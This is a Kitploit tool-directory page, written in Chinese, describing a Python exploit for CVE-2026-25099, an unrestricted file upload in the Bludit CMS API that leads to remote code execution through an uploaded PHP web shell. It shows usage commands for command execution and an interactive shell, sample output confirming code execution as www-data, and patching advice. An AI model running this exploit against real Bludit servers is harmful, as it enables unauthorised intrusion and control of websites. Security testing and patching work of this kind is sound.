Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/yahiahamza/cve-2026-25099
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

Python 漏洞利用程序,针对 Bludit CMS API 无限制文件上传漏洞,可导致远程代码执行,提供命令执行和交互式 Shell,用于授权测试。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-25099 - Bludit CMS API 无限制文件上传导致 RCE

描述

Bludit CMS 3.18.4 之前的版本允许持有有效 API 令牌的已认证攻击者通过 POST /api/files/<page-key> 端点上传任意类型和扩展名的文件。uploadFile() 函数不执行任何文件扩展名或内容验证,允许上传 PHP 网页木马并以 www-data 权限执行。

受影响版本

  • 存在漏洞: Bludit < 3.18.4
  • 已修复: Bludit 3.18.4
  • 前提条件: 有效 API 令牌(可在管理面板的 插件 → API 下查看)

使用方法

root@kitploit:~
# 单条命令执行
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"

# 交互式 Shell
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"

示例输出

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API 文件上传导致 RCE
[*] 目标: http://target
[*] 获取页面密钥...
[+] 页面密钥: create-your-own-content
[*] 上传网页木马...
[+] 木马已上传: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] 验证 RCE...
[+] RCE 已确认: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] 交互式 Shell(输入 'exit' 退出)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

截图

PoC 执行

修复建议

  • 升级到 Bludit 3.18.4 或更高版本
  • 如不需要,请禁用 API 插件
  • 监控 /bl-content/uploads/ 目录中是否有意外的 PHP 文件

参考链接

  • MITRE 上的 CVE-2026-25099
  • 技术分析 - yh.do

作者

Yahia Hamza - https://yh.do

免责声明

本工具仅供授权的安全测试和教育目的使用。请负责任地使用,并且仅针对您拥有测试权限的系统。

下载工具